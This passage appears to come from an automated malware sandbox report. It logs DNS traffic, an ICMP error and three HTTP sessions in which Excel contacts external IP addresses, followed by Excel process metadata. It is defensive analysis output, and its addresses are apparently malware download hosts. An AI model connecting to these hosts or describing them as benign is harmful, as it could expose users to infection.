May 4, 2021 18:27:21.322411060 CEST | 53 | 60342 | 8.8.8.8 | 192.168.2.6 |
May 4, 2021 18:27:22.188952923 CEST | 61346 | 53 | 192.168.2.6 | 8.8.8.8 |
May 4, 2021 18:27:22.237730980 CEST | 53 | 61346 | 8.8.8.8 | 192.168.2.6 |
May 4, 2021 18:27:23.015486956 CEST | 51774 | 53 | 192.168.2.6 | 8.8.8.8 |
May 4, 2021 18:27:23.064205885 CEST | 53 | 51774 | 8.8.8.8 | 192.168.2.6 |
May 4, 2021 18:27:24.415584087 CEST | 56023 | 53 | 192.168.2.6 | 8.8.8.8 |
May 4, 2021 18:27:24.464157104 CEST | 53 | 56023 | 8.8.8.8 | 192.168.2.6 |
May 4, 2021 18:27:25.290689945 CEST | 58384 | 53 | 192.168.2.6 | 8.8.8.8 |
May 4, 2021 18:27:25.341984034 CEST | 53 | 58384 | 8.8.8.8 | 192.168.2.6 |
May 4, 2021 18:27:25.632792950 CEST | 60261 | 53 | 192.168.2.6 | 8.8.8.8 |
May 4, 2021 18:27:25.689579964 CEST | 53 | 60261 | 8.8.8.8 | 192.168.2.6 |
May 4, 2021 18:27:26.988132000 CEST | 56061 | 53 | 192.168.2.6 | 8.8.8.8 |
May 4, 2021 18:27:27.045090914 CEST | 53 | 56061 | 8.8.8.8 | 192.168.2.6 |
May 4, 2021 18:27:31.084626913 CEST | 58336 | 53 | 192.168.2.6 | 8.8.8.8 |
May 4, 2021 18:27:31.133912086 CEST | 53 | 58336 | 8.8.8.8 | 192.168.2.6 |
May 4, 2021 18:27:32.396502972 CEST | 53781 | 53 | 192.168.2.6 | 8.8.8.8 |
May 4, 2021 18:27:32.456934929 CEST | 53 | 53781 | 8.8.8.8 | 192.168.2.6 |
May 4, 2021 18:27:32.840955019 CEST | 54064 | 53 | 192.168.2.6 | 8.8.8.8 |
May 4, 2021 18:27:32.905101061 CEST | 53 | 54064 | 8.8.8.8 | 192.168.2.6 |
May 4, 2021 18:27:33.849351883 CEST | 54064 | 53 | 192.168.2.6 | 8.8.8.8 |
May 4, 2021 18:27:34.082928896 CEST | 53 | 54064 | 8.8.8.8 | 192.168.2.6 |
May 4, 2021 18:27:34.895292997 CEST | 54064 | 53 | 192.168.2.6 | 8.8.8.8 |
May 4, 2021 18:27:35.115504980 CEST | 53 | 54064 | 8.8.8.8 | 192.168.2.6 |
May 4, 2021 18:27:36.493490934 CEST | 52811 | 53 | 192.168.2.6 | 8.8.8.8 |
May 4, 2021 18:27:36.546812057 CEST | 53 | 52811 | 8.8.8.8 | 192.168.2.6 |
May 4, 2021 18:27:36.911353111 CEST | 54064 | 53 | 192.168.2.6 | 8.8.8.8 |
May 4, 2021 18:27:36.982091904 CEST | 53 | 54064 | 8.8.8.8 | 192.168.2.6 |
May 4, 2021 18:27:39.002782106 CEST | 55299 | 53 | 192.168.2.6 | 8.8.8.8 |
May 4, 2021 18:27:39.063780069 CEST | 53 | 55299 | 8.8.8.8 | 192.168.2.6 |
May 4, 2021 18:27:39.972990036 CEST | 63745 | 53 | 192.168.2.6 | 8.8.8.8 |
May 4, 2021 18:27:40.021666050 CEST | 53 | 63745 | 8.8.8.8 | 192.168.2.6 |
May 4, 2021 18:27:40.927424908 CEST | 54064 | 53 | 192.168.2.6 | 8.8.8.8 |
May 4, 2021 18:27:40.978377104 CEST | 53 | 54064 | 8.8.8.8 | 192.168.2.6 |
May 4, 2021 18:27:41.033668041 CEST | 50055 | 53 | 192.168.2.6 | 8.8.8.8 |
May 4, 2021 18:27:41.082216978 CEST | 53 | 50055 | 8.8.8.8 | 192.168.2.6 |
May 4, 2021 18:27:42.093231916 CEST | 61374 | 53 | 192.168.2.6 | 8.8.8.8 |
May 4, 2021 18:27:42.141829014 CEST | 53 | 61374 | 8.8.8.8 | 192.168.2.6 |
May 4, 2021 18:27:43.210931063 CEST | 61374 | 53 | 192.168.2.6 | 8.8.8.8 |
May 4, 2021 18:27:43.260364056 CEST | 53 | 61374 | 8.8.8.8 | 192.168.2.6 |
May 4, 2021 18:27:45.937283993 CEST | 50339 | 53 | 192.168.2.6 | 8.8.8.8 |
May 4, 2021 18:27:45.986340046 CEST | 53 | 50339 | 8.8.8.8 | 192.168.2.6 |
May 4, 2021 18:27:47.150325060 CEST | 63307 | 53 | 192.168.2.6 | 8.8.8.8 |
May 4, 2021 18:27:47.209270000 CEST | 53 | 63307 | 8.8.8.8 | 192.168.2.6 |
May 4, 2021 18:27:48.326251030 CEST | 49694 | 53 | 192.168.2.6 | 8.8.8.8 |
May 4, 2021 18:27:48.374960899 CEST | 53 | 49694 | 8.8.8.8 | 192.168.2.6 |
May 4, 2021 18:27:53.615267992 CEST | 54982 | 53 | 192.168.2.6 | 8.8.8.8 |
May 4, 2021 18:27:53.663891077 CEST | 53 | 54982 | 8.8.8.8 | 192.168.2.6 |
May 4, 2021 18:27:57.820399046 CEST | 50010 | 53 | 192.168.2.6 | 8.8.8.8 |
May 4, 2021 18:27:57.883830070 CEST | 53 | 50010 | 8.8.8.8 | 192.168.2.6 |
May 4, 2021 18:28:14.126549006 CEST | 63718 | 53 | 192.168.2.6 | 8.8.8.8 |
May 4, 2021 18:28:14.184225082 CEST | 53 | 63718 | 8.8.8.8 | 192.168.2.6 |
May 4, 2021 18:28:14.685036898 CEST | 62116 | 53 | 192.168.2.6 | 8.8.8.8 |
May 4, 2021 18:28:14.826639891 CEST | 53 | 62116 | 8.8.8.8 | 192.168.2.6 |
May 4, 2021 18:28:15.473815918 CEST | 63816 | 53 | 192.168.2.6 | 8.8.8.8 |
May 4, 2021 18:28:15.533023119 CEST | 53 | 63816 | 8.8.8.8 | 192.168.2.6 |
May 4, 2021 18:28:15.674973011 CEST | 55014 | 53 | 192.168.2.6 | 8.8.8.8 |
May 4, 2021 18:28:15.746151924 CEST | 53 | 55014 | 8.8.8.8 | 192.168.2.6 |
May 4, 2021 18:28:15.977458000 CEST | 62208 | 53 | 192.168.2.6 | 8.8.8.8 |
May 4, 2021 18:28:16.030518055 CEST | 53 | 62208 | 8.8.8.8 | 192.168.2.6 |
May 4, 2021 18:28:16.566937923 CEST | 57574 | 53 | 192.168.2.6 | 8.8.8.8 |
May 4, 2021 18:28:16.617942095 CEST | 53 | 57574 | 8.8.8.8 | 192.168.2.6 |
May 4, 2021 18:28:17.194921017 CEST | 51818 | 53 | 192.168.2.6 | 8.8.8.8 |
May 4, 2021 18:28:17.252612114 CEST | 53 | 51818 | 8.8.8.8 | 192.168.2.6 |
May 4, 2021 18:28:18.256756067 CEST | 56628 | 53 | 192.168.2.6 | 8.8.8.8 |
May 4, 2021 18:28:18.308296919 CEST | 53 | 56628 | 8.8.8.8 | 192.168.2.6 |
May 4, 2021 18:28:19.781204939 CEST | 60778 | 53 | 192.168.2.6 | 8.8.8.8 |
May 4, 2021 18:28:19.838218927 CEST | 53 | 60778 | 8.8.8.8 | 192.168.2.6 |
May 4, 2021 18:28:20.614972115 CEST | 53799 | 53 | 192.168.2.6 | 8.8.8.8 |
May 4, 2021 18:28:20.677949905 CEST | 53 | 53799 | 8.8.8.8 | 192.168.2.6 |
May 4, 2021 18:28:21.217336893 CEST | 54683 | 53 | 192.168.2.6 | 8.8.8.8 |
May 4, 2021 18:28:21.358124971 CEST | 53 | 54683 | 8.8.8.8 | 192.168.2.6 |
May 4, 2021 18:28:29.811558962 CEST | 59329 | 53 | 192.168.2.6 | 8.8.8.8 |
May 4, 2021 18:28:29.861965895 CEST | 53 | 59329 | 8.8.8.8 | 192.168.2.6 |
May 4, 2021 18:28:58.165365934 CEST | 64021 | 53 | 192.168.2.6 | 8.8.8.8 |
May 4, 2021 18:28:58.254754066 CEST | 53 | 64021 | 8.8.8.8 | 192.168.2.6 |
May 4, 2021 18:29:01.226980925 CEST | 56129 | 53 | 192.168.2.6 | 8.8.8.8 |
May 4, 2021 18:29:01.275686026 CEST | 53 | 56129 | 8.8.8.8 | 192.168.2.6 |
May 4, 2021 18:29:03.200608015 CEST | 58177 | 53 | 192.168.2.6 | 8.8.8.8 |
May 4, 2021 18:29:03.266186953 CEST | 53 | 58177 | 8.8.8.8 | 192.168.2.6 |
ICMP Packets |
---|
Timestamp | Source IP | Dest IP | Checksum | Code | Type |
---|---|---|---|---|---|
May 4, 2021 18:27:43.260519028 CEST | 192.168.2.6 | 8.8.8.8 | d07a | (Port unreachable) | Destination Unreachable |
HTTP Request Dependency Graph |
---|
|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.6 | 49720 | 91.211.91.81 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
May 4, 2021 18:27:41.030962944 CEST | 1127 | OUT | |
May 4, 2021 18:27:41.178436995 CEST | 1129 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.6 | 49722 | 5.34.179.36 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
May 4, 2021 18:27:41.374579906 CEST | 1130 | OUT | |
May 4, 2021 18:27:41.950759888 CEST | 1142 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
2 | 192.168.2.6 | 49723 | 45.153.229.23 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
May 4, 2021 18:27:42.023101091 CEST | 1143 | OUT | |
May 4, 2021 18:27:42.148572922 CEST | 1144 | IN |
Code Manipulations |
---|
Statistics |
---|
System Behavior |
---|
General |
---|
Start time: | 18:27:30 |
Start date: | 04/05/2021 |
Path: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x2b0000 |
File size: | 27110184 bytes |
MD5 hash: | 5D6638F2C8F8571C593999C58866007E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|